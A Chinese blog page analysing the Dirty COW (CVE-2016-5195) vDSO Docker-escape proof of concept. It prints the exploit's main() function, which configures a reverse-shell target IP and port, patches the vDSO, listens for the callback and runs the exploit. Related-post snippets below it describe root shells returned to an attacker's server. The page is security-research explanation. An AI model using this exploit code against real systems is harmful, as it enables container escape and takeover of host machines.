脏牛漏洞-Docker逃逸POC(dirtycow-vdso)代码分析

最新推荐文章于 2025-10-30 23:00:11 发布
原创 最新推荐文章于 2025-10-30 23:00:11 发布 · 7.8k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#脏牛漏洞 #Docker逃逸

本文详细介绍了脏牛漏洞(CVE-2016-5195)如何导致Docker逃逸,解析了利用代码的运行流程和关键函数,包括htonl/htons函数转换、parse_ip_port的IP与端口解析、get_vdso_addr获取vDSO地址、fingerprint_prologue指纹识别、patch_payload与build_vdso_patch的payload构建与注入、create_socket的监听设置以及exploit利用过程。最后,文章阐述了exploit后的恢复操作和yeah函数的连接处理。

利用代码原出处
代码原帖

本人GitHub也保留有漏洞利用相关代码
CVE-2016-5195

作者 : 武汉大学Docker安全研究小组

一 . 代码运行流程


Main函数 

int main(int argc, char *argv[])
{
    struct prologue *prologue;
    struct mem_arg arg;
    uint16_t port;
    uint32_t ip;
    int s;

    ip = htonl(PAYLOAD_IP);
    port = htons(PAYLOAD_PORT);

    if (argc > 1) {
        if (parse_ip_port(argv[1], &ip, &port) != 0)
            return EXIT_FAILURE;
    }

    fprintf(stderr, "[*] payload target: %s:%d\n",
        inet_ntoa(*(struct in_addr *)&ip), ntohs(port));

    arg.vdso_addr = get_vdso_addr();
    if (arg.vdso_addr == NULL)
        return EXIT_FAILURE;

    prologue = fingerprint_prologue(arg.vdso_addr);
    if (prologue == NULL) {
        fprintf(stderr, "[-] this vDSO version isn't supported\n");
        fprintf(stderr, "    add first entry point instructions to prologues\n");
        return EXIT_FAILURE;
    }

    if (patch_payload(prologue, ip, port) == -1)
        return EXIT_FAILURE;

    if (build_vdso_patch(arg.vdso_addr, prologue) == -1)
        return EXIT_FAILURE;

    s = create_socket(port);
    if (s == -1)
        return EXIT_FAILURE;

    if (exploit(&arg, true) == -1) {
        fprintf(stderr, "exploit failed\n");
        return EXIT_FAILURE;
    }

    yeah(&arg, s);

    return EXIT_SUCCESS;
}
Created with Raphaël 2.1.0 开始 htonl()/htons() IP转换 是否有运行参数?
最低0.47元/天 解锁文章
Docker逃逸--漏洞POC测试
07-25 1444
漏洞(CVE-2016-5195)VDSO(虚拟动态共享对象) 一、漏洞描述 Dirty Cow(CVE-2016-5195)是Linux内核中的权限提升漏洞,源于Linux内核的内存子系统在处理写入时拷贝(copy-on-write, Cow)存在竞争条件(race condition),允许恶意用户提权获取其他只读内存映射的写访问权限。 竞争条件意为任务执行顺序异常,可能导致应...
Dirtycow(CVE-2016-5195)容器逃逸漏洞复现与分析
SHELLCODE_8BIT的博客
08-07 982
众所周知,操作系统为我们管理硬件资源,并以系统调用的方式对用户进程提供 API,但是 syscall 很慢,涉及陷入内核以及上下文切换。对于少量频繁调用的系统调用(比如获取当期系统时间)来说,是否可以某种安全的方式开放到用户空间,让用户直接访问而不需要经过 syscall 呢?vDSO 就是用来解决这个问题的。vDSO 全程为这个名词大家应该有所耳闻,就是 Linux 下的动态库的全称,而virtual表明,这个动态库是通过某种手段虚拟出来的,并不真正存在于 Linux 文件系统中。
后渗透——Docker容器逃逸
未完成的歌~的博客
02-22 3008
在渗透测试中,如果获取了目标主机的 shell,但发现其运行在 docker 环境中,要进一步渗透,就需要逃逸到宿主机。另外,还可能存在更复杂的场景,例如物理机运行虚拟机,虚拟机再运行 docker 容器,这种情况下还需要实现虚拟机逃逸。本文主要总结关于 docker 容器逃逸的相关技术与方法。涉及内核漏洞的提权原理都比较复杂,很难理解,会用 poc 就行了。其余逃逸很大程度都是通过挂载进行逃逸。要么本容器挂载,要么本容器里再创建一个容器挂载。
Python 实战:Web 漏洞 Python POC 代码及原理详解(3)
最新发布
hj06112的博客
10-30 888
主要介绍通过python构造逻辑漏洞,反序列化漏洞poc
docker逃逸的几种方法以及其原理
热门推荐
Shanfenglan's blog
10-22 12万+
CATALOG前言利用dirty cow来进行docker逃逸1.前置知识2.利用dirty cow与VDSO来实现docker逃逸的过程3.利用过程1.判断是否为docker环境2.下载脚本3.利用脚本4.利用结果通过cve-2019-5736来达到docker逃逸1.利用原理与条件2.漏洞触发过程3.具体操作第一步:确定docker环境第二步:下载利用脚本并修改第三步:编译脚本第四步:将编译好的main文件上传到docker中第五步:执行脚本并等待此docker再次被exec4.对此种方式利用的理解配置
探索 Dirty COW VDSO:一个深入Linux内核的安全研究工具
gitblog_00092的博客
04-18 374
探索 Dirty COW VDSO:一个深入Linux内核的安全研究工具 dirtycow-vdsoPoC for Dirty COW (CVE-2016-5195)项目地址:https://gitcode.com/gh_mirrors/di/dirtycow-vdso 在网络安全领域,了解和研究漏洞是至关重要的工作。Dirty COW(亦称为 CVE-2016-5195)是一个著名的Linux...
Docker容器逃逸
m0_74402888的博客
08-15 1249
最简单精准的方式就是查询系统进程的cgroup信息,通过响应的内容可以识别当前进程所处的运行环境,就可以知道是在虚拟机、docker还是kubepods里。一个容器技术,类似于VM虚拟机,别人环境封装好打包成一个镜像,使用docker技术就能快速把这个镜像环境还原出来。通过判断根目录下的 .dockerenv文件是否存在,可以简单的识别docker环境。攻击者攻击虚拟空间磁盘,拿到最高权限也是虚拟空间的权限,而不是真实物理环境的权限。在容器内部创建一个新的容器,并将宿主机目录挂载到新的容器内部。
技术干货 | Docker 容器逃逸案例汇集
08-02 2万+
当获得一个Webshell,我们的攻击点可能处于服务器的一个虚拟目录里,一台虚拟机或是一台物理机,甚至是在一个Docker容器里。 假设,我们获取的Webshell就处于Docker容器里,那么,我们该如何破局呢? Docker 容器逃逸案例: 1、判断是否处于docker容器里 2、配置不当引起的逃逸 Docker Remote API 未授权访问 docker.s...
基于网络安全的Docker逃逸
kali_Ma的博客
10-21 3139
这段shellcode初始化的时候会检查是否被root调用,如果是则继续执行,如果不是,则接着执行clock_gettime函数,接下来它会检测/tmp/.X文件的存在,如果存在,则这时已经是root权限了,然后它会打开一个反向的TCP链接,为Shellcode中填写的ip返回一个Shell。主从管理、默认通过2375端口通信。上面命令的含义是进入test这个容器,当宿主机上执行exec命令来进入我们运行了脚本的容器的时候,宿主机就会反弹root权限的shell给我们的vps的监听端口,至此利用结束。
Docker Dirty Cow逃逸
weixin_33966365的博客
10-29 456
2019独角兽企业重金招聘Python工程师标准>>> ...
Docker逃逸原理
11-06
Docker有6大Namespace,PPT中分析了6个Namespace的基本原理和最终逃逸原理
docker容器逃逸学习篇
weixin_46148739的博客
09-10 2128
本文对常见docker逃逸漏洞做了总结,包含漏洞环境的搭建,原理说明,利用方式,以及cdk工具的简单介绍等将cdk传入你拿下的容器将cdk工具丢到你的公网服务器,并且监听端口CDK包括三个功能模块Evaluate: 容器内部信息收集,以发现潜在的弱点便于后续利用。Exploit: 提供容器逃逸、持久化、横向移动等利用方式。Tool: 修复渗透过程中常用的linux命令以及与Docker/K8s API交互的命令。# 容器内部信息收集# 查看可利用的payload# 利用Exploit 模块。
关于Docker逃逸
Aiwin的博客
03-22 2744
Docker逃逸复现
Docker 容器逃逸案例分析
yunqishequ1的博客
07-20 5191
摘要: ## 0. 前言 本文参考自《Docker 容器与容器云》 这个容器逃逸的 case 存在于 Docker 1.0 之前的绝大多数版本。 目前使用 Docker 1.0 之前版本的环境几乎不存在了,这篇分析的主要目的是为了加深系统安全方面的学习。 本案例所分析的 PoC 源码地址:[shocker.c](https://github.com/gabrtv/shocker/b 0.
DockerDocker逃逸小结
woodwhale的博客
03-28 2005
docker逃逸小结
生命在于学习——docker逃逸
易水哲的博客
12-02 5279
docker逃逸就是从当前docker容器权限中逃逸出来,获得宿主机的权限。
docker逃逸总结
2401_88752684的博客
12-06 1107
CVE-2019-5736 是 runC 的 CVE 漏洞编号,runC 最初是作为 Docker 的一部分开发的,后来作为一个单独的开源工具和库被提取出来,在 docker 整个架构的运行过程中,Containerd 向 docker 提供运行容器的 API,二者通过 grpc 进行交互。使用特权模式启动的容器时,docker 管理员可通过 mount 命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令。之间的任何内容都将用作ref。
Docker 17.12.1 & NVIDIA-Docker 2.0.3 RPM 安装包发布
### Docker 17.12.1 Docker是一种开源的应用容器引擎,它使得应用的打包、部署以及运行变得简便。它允许开发者将应用连同其依赖包一起打包到一个可移植的容器中,然后在任何支持Docker的机器上运行,这就极大地提高...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值